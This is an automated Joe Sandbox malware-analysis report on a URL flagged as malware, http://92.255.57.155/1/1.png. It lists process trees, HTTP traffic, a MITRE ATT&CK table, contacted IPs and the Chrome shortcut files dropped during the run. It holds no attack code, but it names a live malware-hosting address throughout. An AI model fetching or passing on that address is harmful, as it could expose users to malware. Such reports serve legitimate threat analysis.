Edit tour

Windows Analysis Report
http://92.255.57.155/1/1.png

Overview

General Information

Sample URL:	http://92.255.57.155/1/1.png
Analysis ID:	1586274
Infos:

Detection

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

AI detected suspicious URL

Stores files to the Windows start menu directory

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 1088 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

chrome.exe (PID: 6448 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1960,i,9567943827723971082,11944864733081226012,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

chrome.exe (PID: 5672 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://92.255.57.155/1/1.png" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: http://92.255.57.155/1/1.png

Avira URL Cloud: detection malicious, Label: malware

Phishing

AI detected suspicious URL

Source: URL

Joe Sandbox AI: AI detected IP in URL: http://92.255.57.155

Source: http://92.255.57.155/1/1.png

HTTP Parser: No favicon

Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155

Source: global traffic	HTTP traffic detected: GET /1/1.png HTTP/1.1Host: 92.255.57.155Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 92.255.57.155Connection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Referer: http://92.255.57.155/1/1.pngAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /1/1.png HTTP/1.1Host: 92.255.57.155Connection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9If-None-Match: "c8b79db44055db1:0"If-Modified-Since: Mon, 23 Dec 2024 13:43:53 GMT

Source: global traffic

DNS traffic detected: DNS query: www.google.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0Date: Wed, 08 Jan 2025 22:20:39 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 7

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown	Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443

Source: classification engine

Classification label: mal52.win@17/10@2/4

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1960,i,9567943827723971082,11944864733081226012,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://92.255.57.155/1/1.png"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1960,i,9567943827723971082,11944864733081226012,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
http://92.255.57.155/1/1.png	100%	Avira URL Cloud	malware

Source	Detection	Scanner	Label	Link
http://92.255.57.155/favicon.ico	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.google.com	142.250.186.68	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://92.255.57.155/favicon.ico	true	Avira URL Cloud: safe	unknown
http://92.255.57.155/1/1.png	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.186.68	www.google.com	United States	15169	GOOGLEUS	false
92.255.57.155	unknown	Russian Federation	42253	TELSPRU	true
239.255.255.250	unknown	Reserved	unknown	unknown	false

Private

IP
192.168.2.17

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1586274
Start date and time:	2025-01-08 23:20:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	http://92.255.57.155/1/1.png
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal52.win@17/10@2/4
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, TextInputHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.184.195, 142.250.185.206, 64.233.167.84, 172.217.18.110, 142.250.186.46, 142.250.184.206, 142.250.185.238, 142.250.186.174, 142.250.186.78, 142.250.185.99, 142.250.181.238, 142.250.185.142, 4.175.87.197, 23.56.254.164, 20.190.159.75, 13.107.5.88, 2.23.227.208
Excluded domains from analysis (whitelisted): www.bing.com, clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, login.live.com, evoke-windowsservices-tas.msedge.net, update.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: http://92.255.57.155/1/1.png

Input	Output
URL: http://92.255.57.155 Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": true, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: http://92.255.57.155

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 21:20:36 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.998713751697235
Encrypted:	false
SSDEEP:	48:8x7dojTJ7GaH2idAKZdA1JehwiZUklqehhy+3:8xKj4ziy
MD5:	C978499D7E8FDFB2D9619AE7371AFBA5
SHA1:	EB953B5B352D99EA8DDC7715ABB69E6BFFE2D7C1
SHA-256:	99081E4AA41B83B2E5E9C37637076AB6A97F77F94E6F7E54931757280A5F2748
SHA-512:	50427E76AC142DB8318D6804FFDFB712B3DE6DED04CA9F5D5E0821532AE07CF90E9597BDA51452847C93B65810D77E5B4E43B729F72B69E7DD4FD43180E18163
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,....a...b......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I(Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V(Z......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V(Z.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V(Z.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............?.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 21:20:36 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	4.0162053081566125
Encrypted:	false
SSDEEP:	48:8I3Q7dojTJ7GaH2idAKZdA10eh/iZUkAQkqehSy+2:8I3QKj4R9Q/y
MD5:	82ED301B8EAB417F491584C89086CFE2
SHA1:	BDA75709727A9FB81C372A5BB3CBCF2877AB50C8
SHA-256:	90684639F043956A0652F02DC414395F185E4201F92318E57A6BEE3F74E50A1B
SHA-512:	6DEE9F2DB92E48EA24583896833CD697231A4ACB2B98F7C6E6A2BCBF7AC581E7A81EE384270540C1C40CA2094F6E0FA87FE3FC378CAF976DF71BB3D8206DA636
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.........b......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I(Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V(Z......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V(Z.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V(Z.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............?.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.0232517116076725
Encrypted:	false
SSDEEP:	48:8e7dojTJ7GjH2idAKZdA14tIeh7sFiZUkmgqeh7sgy+BX:8eKj4enmy
MD5:	A9E95528479ABFAF51488751AE12B8E1
SHA1:	7844C17A1A36A525B6EE02A296614D6A4A567761
SHA-256:	773B4C28315144186EDE49DBFE2C1298E142C7FCDFA62F165A66AB7AC0F9CB6A
SHA-512:	9BF972BDC8E39E0A1EE15A463F3D350D2CF5C556EA61481591447F799E343D2A0FD84694FEED5C33FE411B6E6E42F7D88DBEF0008B56BB197FA009D8859CD2F7
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I(Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V(Z......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V(Z.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............?.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 21:20:36 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	4.014181445933218
Encrypted:	false
SSDEEP:	48:8h7dojTJ7GaH2idAKZdA1behDiZUkwqehuy+R:8hKj4ioy
MD5:	1793A10FBED871FCECD485098104346E
SHA1:	71765DEEA15C9202940AABBDE6C11AE9FDB1D2A6
